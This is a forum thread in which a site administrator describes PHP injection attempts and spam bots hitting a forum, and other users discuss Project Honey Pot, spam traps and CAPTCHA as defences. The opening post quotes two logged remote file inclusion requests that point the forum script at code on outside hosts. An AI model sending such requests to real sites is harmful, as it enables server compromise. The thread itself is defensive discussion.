Lately I've been getting a load of PHP injection hacks like
forums/index.php?;tpstart=http://usa-gymnastics.org/women/nav?
/forums/index.php?;tpstart=http://www.goodasgold.com/nav?

and many others addresses in the forum error log!
I've also seen loads of spam-bots trying to access and post into the forum!

Then today I found this site

Quote from: Project Honey PotWhat is Project Honey Pot?
Project Honey Pot is a distributed network of decoy web pages website administrators can include on their sites in order to gather information about robots, crawlers, and spiders. We collate data on harvesters, spammers, dictionary attackers, and comment spammers. We make this data available to our members in order for them to protect their websites and inboxes.

Is there anyone that been trying out the "Project Honey Pot" in their forums??
Do you think they are reliable??

Zetan

I have heard of it, and use Spam Traps on my site

If you go to the footer.. DESIG.. each letter is a link.
I've not incorporated it into my overall default theme yet.

Be careful what you sign up to.. I signed up with BlueFrog to combat email spam.. It made it 50 X worse.
I had no spam before.. so why I signed up to that, I have no idea. Still, it's a disposable email address anyway.

:) Yeah, that's why I put up the question here! Don't want to sign up to something fishy!

Do you know if has been helping you to reduce the amount of spambots?

To be honest, I can't tell.. I've had no spam bots register and post for quite a while.
I think the improved CAPTCHA in SMF helps, and not many spam bots activate their accounts via the email activation option.

Before the update.. I had loads of spam bots register and post. Which is why I was looking into methods to prevent it.
I hate spam.
